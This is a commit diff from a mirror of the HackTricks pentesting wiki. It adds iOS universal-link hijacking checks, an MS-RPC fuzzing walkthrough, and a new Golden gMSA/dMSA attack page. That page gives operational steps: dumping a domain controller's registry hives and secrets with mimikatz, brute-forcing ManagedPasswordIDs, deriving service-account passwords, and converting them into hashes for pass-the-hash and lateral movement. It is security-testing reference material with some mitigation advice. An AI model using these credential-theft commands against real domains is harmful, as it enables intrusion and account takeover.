maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

Browse Source
This commit is contained in:
carlospolop 2025-07-18 10:32:07 +02:00
commit faaa6a6d15
5 changed files with 225 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
src/SUMMARY.md
View File

@ -268,6 +268,7 @@
- [DSRM Credentials](windows-hardening/active-directory-methodology/dsrm-credentials.md)
- [External Forest Domain - OneWay (Inbound) or bidirectional](windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md)
- [External Forest Domain - One-Way (Outbound)](windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md)
- [Golden Dmsa Gmsa](windows-hardening/active-directory-methodology/golden-dmsa-gmsa.md)
- [Golden Ticket](windows-hardening/active-directory-methodology/golden-ticket.md)
- [Kerberoast](windows-hardening/active-directory-methodology/kerberoast.md)
- [Kerberos Authentication](windows-hardening/active-directory-methodology/kerberos-authentication.md)

38
src/mobile-pentesting/ios-pentesting/ios-universal-links.md
View File

@ -26,7 +26,19 @@ If working with a compiled application, entitlements can be extracted as outline
### **Retrieving the Apple App Site Association File**
The `apple-app-site-association` file should be retrieved from the server using the domains specified in the entitlements. Ensure the file is accessible via HTTPS directly at `https://<domain>/apple-app-site-association`. Tools like the [Apple App Site Association (AASA) Validator](https://branch.io/resources/aasa-validator/) can aid in this process.
The `apple-app-site-association` file should be retrieved from the server using the domains specified in the entitlements. Ensure the file is accessible via HTTPS directly at `https://<domain>/apple-app-site-association` (or `/.well-known/apple-app-site-association`). Tools like the [Apple App Site Association (AASA) Validator](https://branch.io/resources/aasa-validator/) can aid in this process.
> **Quick enumeration from a macOS/Linux shell**
>
> ```bash
> # assuming you have extracted the entitlements to ent.xml
> doms=$(plutil -extract com.apple.developer.associated-domains xml1 -o - ent.xml | \
> grep -oE 'applinks:[^<]+' | cut -d':' -f2)
> for d in $doms; do
> echo "[+] Fetching AASA for $d";
> curl -sk "https://$d/.well-known/apple-app-site-association" | jq '.'
> done
> ```
### **Handling Universal Links in the App**
@ -78,16 +90,34 @@ func application(_ application: UIApplication,
Through **diligent configuration and validation**, developers can ensure that universal links enhance user experience while maintaining security and privacy standards.
## Common Vulnerabilities & Pentesting Checks
| # | Weakness | How to test | Exploitation / Impact |
|---|----------|------------|-----------------------|
| 1 | **Over-broad `paths` / `components`** in the AASA file (e.g. `"/": "*"` or wildcards such as `"/a/*"`). | • Inspect the downloaded AASA and look for `*`, trailing slashes, or `{"?": …}` rules.<br>• Try to request unknown resources that still match the rule (`https://domain.com/a/evil?_p_dp=1`). | Universal-link hijacking: a malicious iOS app that registers the same domain could claim all those links and present phishing UI. A real-world example is the May 2025 Temu.com bug-bounty report where an attacker could redirect any `/a/*` path to their own app. |
| 2 | **Missing server-side validation** of deep-link paths. | After identifying the allowed paths, issue `curl`/Burp requests to non-existing resources and observe HTTP status codes. Anything other than `404` (e.g. 200/302) is suspicious. | An attacker can host arbitrary content behind an allowed path and serve it via the legitimate domain, increasing the success rate of phishing or session-token theft. |
| 3 | **App-side URL handling without scheme/host whitelisting** (CVE-2024-10474 Mozilla Focus < 132). | Look for direct `openURL:`/`open(_:options:)` calls or JavaScript bridges that forward arbitrary URLs. | Internal pages can smuggle `myapp://` or `https://` URLs that bypass the browsers URL-bar safety checks, leading to spoofing or unintended privileged actions. |
| 4 | **Use of wildcard sub-domains** (`*.example.com`) in the entitlement. | `grep` for `*.` in the entitlements. | If any sub-domain is taken over (e.g. via an unused S3 bucket), the attacker automatically gains the Universal Link binding. |
### Quick Checklist
* [ ] Extract entitlements and enumerate every `applinks:` entry.
* [ ] Download AASA for each entry and audit for wildcards.
* [ ] Verify the web server returns **404** for undefined paths.
* [ ] In the binary, confirm that **only** trusted hosts/schemes are handled.
* [ ] If the app uses the newer `components` syntax (iOS 11+), fuzz query-parameter rules (`{"?":{…}}`).
## Tools
- [GetUniversal.link](https://getuniversal.link/): Helps simplify the testing and management of your app's Universal Links and AASA file. Simply enter your domain to verify AASA file integrity or use the custom dashboard to easily test link behavior. This tool also helps you determine when Apple will next index your AASA file.
- [Knil](https://github.com/ethanhuang13/knil): Open-source iOS utility that fetches, parses and lets you **tap-test** every Universal Link declared by a domain directly on device.
- [universal-link-validator](https://github.com/urbangems/universal-link-validator): CLI / web validator that performs strict AASA conformance checks and highlights dangerous wildcards.
## References
- [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#static-analysis](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#static-analysis)
- [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#testing-object-persistence-mstg-platform-8)
- [https://medium.com/@m.habibgpi/universal-link-hijacking-via-misconfigured-aasa-file-on-temu-com-eadfcb745e4e](https://medium.com/@m.habibgpi/universal-link-hijacking-via-misconfigured-aasa-file-on-temu-com-eadfcb745e4e)
- [https://nvd.nist.gov/vuln/detail/CVE-2024-10474](https://nvd.nist.gov/vuln/detail/CVE-2024-10474)
{{#include ../../banners/hacktricks-training.md}}

68
src/network-services-pentesting/135-pentesting-msrpc.md
View File

@ -89,6 +89,68 @@ It is possible to execute remote code on a machine, if the credentials of a vali
The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/9780596510305/tree/master/tools/rpctools) can interact with this port.
## Automated Fuzzing of MSRPC Interfaces
MS-RPC interfaces expose a large and often undocumented attack surface. The open-source [MS-RPC-Fuzzer](https://github.com/warpnet/MS-RPC-Fuzzer) PowerShell module builds on James Forshaws `NtObjectManager` to *dynamically* create RPC client stubs from the interface metadata that is already present in Windows binaries. Once a stub exists the module can bombard each procedure with mutated inputs and log the outcome, making **reproducible, large-scale fuzzing of RPC endpoints possible without writing a single line of IDL**.
### 1. Inventory the interfaces
```powershell
# Import the module (download / git clone first)
Import-Module .\MS-RPC-Fuzzer.psm1
# Parse a single binary
Get-RpcServerData -Target "C:\Windows\System32\efssvc.dll" -OutPath .\output
# Or crawl the whole %SystemRoot%\System32 directory
Get-RpcServerData -OutPath .\output
```
`Get-RpcServerData` will extract the UUID, version, binding strings (named-pipe / TCP / HTTP) and **full procedure prototypes** for every interface it encounters and store them in `rpcServerData.json`.
### 2. Run the fuzzer
```powershell
'.\output\rpcServerData.json' |
Invoke-RpcFuzzer -OutPath .\output `
-MinStrLen 100 -MaxStrLen 1000 `
-MinIntSize 9999 -MaxIntSize 99999
```
Relevant options:
* `-MinStrLen` / `-MaxStrLen` size range for generated strings
* `-MinIntSize` / `-MaxIntSize` value range for mutated integers (useful for overflow testing)
* `-Sorted` execute procedures in an order that honours **parameter dependencies** so that outputs of one call can serve as inputs of the next (dramatically increases reachable paths)
The fuzzer implements 2 strategies:
1. **Default fuzzer** random primitive values + default instances for complex types
2. **Sorted fuzzer** dependency-aware ordering (see `docs/Procedure dependency design.md`)
Every call is written atomically to `log.txt`; after a crash the **last line immediately tells you the offending procedure**. The result of each call is also categorised into three JSON files:
* `allowed.json` call succeeded and returned data
* `denied.json` server responded with *Access Denied*
* `error.json` any other error / crash
### 3. Visualise with Neo4j
```powershell
'.\output\allowed.json' |
Import-DataToNeo4j -Neo4jHost 192.168.56.10:7474 -Neo4jUsername neo4j
```
`Import-DataToNeo4j` converts the JSON artefacts into a graph structure where:
* RPC servers, interfaces and procedures are **nodes**
* Interactions (`ALLOWED`, `DENIED`, `ERROR`) are **relationships**
Cypher queries can then be used to quickly spot dangerous procedures or to replay the exact chain of calls that preceded a crash.
⚠️ The fuzzer is *destructive*: expect service crashes and even BSODs always run it in an isolated VM snapshot.
### Automated Interface Enumeration & Dynamic Client Generation (NtObjectManager)
PowerShell guru **James Forshaw** exposed most of the Windows RPC internals inside the opensource *NtObjectManager* module. Using it you can turn any RPC server DLL / EXE into a **fully-featured client stub** in seconds no IDL, MIDL or manual unmarshalling required.
@ -137,8 +199,6 @@ $client.EfsRpcOpenFileRaw([ref]$ctx, "\\\127.0.0.1\test", 0)
Authentication (Kerberos / NTLM) and encryption levels (`PacketIntegrity`, `PacketPrivacy`, …) can be supplied directly via the `Connect-RpcClient` cmdlet ideal for **bypassing Security Descriptors** that protect high-privilege named pipes.
---
### Context-Aware RPC Fuzzing (MS-RPC-Fuzzer)
Static interface knowledge is great, but what you really want is **coverage-guided fuzzing** that understands *context handles* and complex parameter chains. The open-source **MS-RPC-Fuzzer** project automates exactly that workflow:
@ -163,18 +223,16 @@ A single out-of-bounds write or unexpected exception will be surfaced immediatel
> ⚠️ Many RPC services execute in processes running as **NT AUTHORITY\SYSTEM**. Any memory-safety issue here usually translates to local privilege escalation or (when exposed over SMB/135) *remote code execution*.
---
## References
- [Automating MS-RPC vulnerability research (2025, Incendium.rocks)](https://www.incendium.rocks/posts/Automating-MS-RPC-Vulnerability-Research/)
- [MS-RPC-Fuzzer context-aware RPC fuzzer](https://github.com/warpnet/MS-RPC-Fuzzer)
- [NtObjectManager PowerShell module](https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/tree/master/NtObjectManager)
- [https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/)
- [https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/](https://www.cyber.airbus.com/the-oxid-resolver-part-2-accessing-a-remote-object-inside-dcom/)
- [https://0xffsec.com/handbook/services/msrpc/](https://0xffsec.com/handbook/services/msrpc/)
- [MS-RPC-Fuzzer (GitHub)](https://github.com/warpnet/MS-RPC-Fuzzer)
{{#include ../banners/hacktricks-training.md}}

8
src/windows-hardening/active-directory-methodology/README.md
View File

@ -638,7 +638,13 @@ For in-depth information, one might explore research on [Bypassing SID Filtering
An attack vector involves targeting privileged gMSAs within the domain. The KDS Root key, essential for calculating gMSAs' passwords, is stored within the Configuration NC. With SYSTEM privileges on any DC, it's possible to access the KDS Root key and compute the passwords for any gMSA across the forest.
Detailed analysis can be found in the discussion on [Golden gMSA Trust Attacks](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent).
Detailed analysis and step-by-step guidance can be found in:
{{#ref}}
golden-dmsa-gmsa.md
{{#endref}}
Additional external research: [Golden gMSA Trust Attacks](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent).
**Schema change attack**

120
src/windows-hardening/active-directory-methodology/golden-dmsa-gmsa.md Normal file
View File

@ -0,0 +1,120 @@
# Golden gMSA/dMSA Attack (Offline Derivation of Managed Service Account Passwords)
{{#include ../../banners/hacktricks-training.md}}
## Overview
Windows Managed Service Accounts (MSA) are special principals designed to run services without the need to manually manage their passwords.
There are two major flavours:
1. **gMSA** group Managed Service Account can be used on multiple hosts that are authorised in its `msDS-GroupMSAMembership` attribute.
2. **dMSA** delegated Managed Service Account the (preview) successor to gMSA, relying on the same cryptography but allowing more granular delegation scenarios.
For both variants the **password is not stored** on each Domain Controller (DC) like a regular NT-hash. Instead every DC can **derive** the current password on-the-fly from:
* The forest-wide **KDS Root Key** (`KRBTGT\KDS`) randomly generated GUID-named secret, replicated to every DC under the `CN=Master Root Keys,CN=Group Key Distribution Service, CN=Services, CN=Configuration, …` container.
* The target account **SID**.
* A per-account **ManagedPasswordID** (GUID) found in the `msDS-ManagedPasswordId` attribute.
The derivation is: `AES256_HMAC( KDSRootKey , SID || ManagedPasswordID )` → 240 byte blob finally **base64-encoded** and stored in the `msDS-ManagedPassword` attribute.
No Kerberos traffic or domain interaction is required during normal password usage a member host derives the password locally as long as it knows the three inputs.
## Golden gMSA / Golden dMSA Attack
If an attacker can obtain all three inputs **offline** they can compute **valid current and future passwords** for **any gMSA/dMSA in the forest** without touching the DC again, bypassing:
* Kerberos pre-authentication / ticket request logs
* LDAP read auditing
* Password change intervals (they can pre-compute)
This is analogous to a *Golden Ticket* for service accounts.
### Prerequisites
1. **Forest-level compromise** of **one DC** (or Enterprise Admin). `SYSTEM` access is enough.
2. Ability to enumerate service accounts (LDAP read / RID brute-force).
3. .NET ≥ 4.7.2 x64 workstation to run [`GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) or equivalent code.
### Phase 1 Extract the KDS Root Key
Dump from any DC (Volume Shadow Copy / raw SAM+SECURITY hives or remote secrets):
```cmd
reg save HKLM\SECURITY security.hive
reg save HKLM\SYSTEM system.hive
# With mimikatz on the DC / offline
mimikatz # lsadump::secrets
mimikatz # lsadump::trust /patch # shows KDS root keys too
```
The base64 string labelled `RootKey` (GUID name) is required in later steps.
### Phase 2 Enumerate gMSA/dMSA objects
Retrieve at least `sAMAccountName`, `objectSid` and `msDS-ManagedPasswordId`:
```powershell
# Authenticated or anonymous depending on ACLs
Get-ADServiceAccount -Filter * -Properties msDS-ManagedPasswordId | \
Select sAMAccountName,objectSid,msDS-ManagedPasswordId
```
[`GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) implements helper modes:
```powershell
# LDAP enumeration (kerberos / simple bind)
GoldendMSA.exe info -d example.local -m ldap
# RID brute force if anonymous binds are blocked
GoldendMSA.exe info -d example.local -m brute -r 5000 -u jdoe -p P@ssw0rd
```
### Phase 3 Guess / Discover the ManagedPasswordID (when missing)
Some deployments *strip* `msDS-ManagedPasswordId` from ACL-protected reads.
Because the GUID is 128-bit, naïve bruteforce is infeasible, but:
1. The first **32 bits = Unix epoch time** of the account creation (minutes resolution).
2. Followed by 96 random bits.
Therefore a **narrow wordlist per account** (± few hours) is realistic.
```powershell
GoldendMSA.exe wordlist -s <SID> -d example.local -f example.local -k <KDSKeyGUID>
```
The tool computes candidate passwords and compares their base64 blob against the real `msDS-ManagedPassword` attribute the match reveals the correct GUID.
### Phase 4 Offline Password Computation & Conversion
Once the ManagedPasswordID is known, the valid password is one command away:
```powershell
# derive base64 password
GoldendMSA.exe compute -s <SID> -k <KDSRootKey> -d example.local -m <ManagedPasswordID>
# convert to NTLM / AES keys for pass-the-hash / pass-the-ticket
GoldendMSA.exe convert -d example.local -u svc_web$ -p <Base64Pwd>
```
The resulting hashes can be injected with **mimikatz** (`sekurlsa::pth`) or **Rubeus** for Kerberos abuse, enabling stealth **lateral movement** and **persistence**.
## Detection & Mitigation
* Restrict **DC backup and registry hive read** capabilities to Tier-0 administrators.
* Monitor **Directory Services Restore Mode (DSRM)** or **Volume Shadow Copy** creation on DCs.
* Audit reads / changes to `CN=Master Root Keys,…` and `userAccountControl` flags of service accounts.
* Detect unusual **base64 password writes** or sudden service password reuse across hosts.
* Consider converting high-privilege gMSAs to **classic service accounts** with regular random rotations where Tier-0 isolation is not possible.
## Tooling
* [`Semperis/GoldenDMSA`](https://github.com/Semperis/GoldenDMSA) reference implementation used in this page.
* [`mimikatz`](https://github.com/gentilkiwi/mimikatz) `lsadump::secrets`, `sekurlsa::pth`, `kerberos::ptt`.
* [`Rubeus`](https://github.com/GhostPack/Rubeus) pass-the-ticket using derived AES keys.
## References
- [Golden dMSA authentication bypass for delegated Managed Service Accounts](https://www.semperis.com/blog/golden-dmsa-what-is-dmsa-authentication-bypass/)
- [Semperis/GoldenDMSA GitHub repository](https://github.com/Semperis/GoldenDMSA)
- [Improsec Golden gMSA trust attack](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent)
{{#include ../../banners/hacktricks-training.md}}